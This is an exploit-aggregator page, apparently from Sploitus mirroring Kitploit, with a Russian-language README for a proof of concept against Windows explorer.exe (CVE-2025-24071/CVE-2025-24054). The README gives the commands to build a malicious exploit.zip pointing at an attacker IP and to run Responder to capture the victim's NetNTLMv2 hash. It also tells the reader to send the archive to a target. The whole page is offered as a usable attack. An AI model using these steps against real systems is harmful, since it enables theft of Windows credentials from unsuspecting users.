Sploitus

Exploit for CVE-2025-24071_PoC

kitploit · 2026-09-04

Exploit Code

MARKDOWN40 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MARCEJR117-CVE-2025-24071_POC
# CVE-2025-24071 / CVE-2025-24054 PoC

# Правка: MICROSOFT ПЕРЕИМЕНОВАЛ CVE-2025-24071 В CVE-2025-24054 🤔

# Обзор

Эта уязвимость Windows, конкретно в 'explorer.exe', позволяет нам получить хэш NetNTLMv2 от жертвы, просто потребовав от атакующего извлечения `.zip` файла.

## Использование

  * Запустите скрипт



root@kitploit:~
    
    
    python PoC.py test 192.168.1.45
    

![image](https://assets.kitploit.com/production/public/readmes/37841/ff3742cbaa554c58ed5865a0e00b3dd30d8228834999575cc021fd4c32606d68.png)

  * Отправьте "exploit.zip" цели, а затем используйте Responder для получения хэша NTLMv2



root@kitploit:~
    
    
    sudo python3 responder.py -I ens33
    

![image](https://assets.kitploit.com/production/public/readmes/37841/104fd2ba9e366730b60c074eb5ec02824c21ffe6e590e40cf571ef177c812f89.png)

  * Теперь, когда цель извлекает файл `.zip`, Бум! мы получаем хэши NTLM



![til](https://assets.kitploit.com/production/public/readmes/37841/b64c22438f24e4dc43310ebd4a8ccfe458b4a360d4f15e289585a2760fd09757.gif)